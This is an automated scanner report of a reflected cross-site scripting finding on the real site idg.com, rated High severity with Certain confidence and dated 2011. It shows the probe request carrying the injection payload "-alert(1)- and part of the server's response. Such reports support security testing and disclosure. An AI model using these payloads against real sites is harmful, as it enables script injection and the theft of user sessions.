1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://idg.com |
Path: | / |
GET /?43b9d"-alert(1)- Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Fri, 07 Jan 2011 22:04:03 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <link rel="stylesheet" type="text/css" href="/www/homenew.nsf <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA pageTracker._trackPa } catch(err) {}</script> ...[SNIP]... |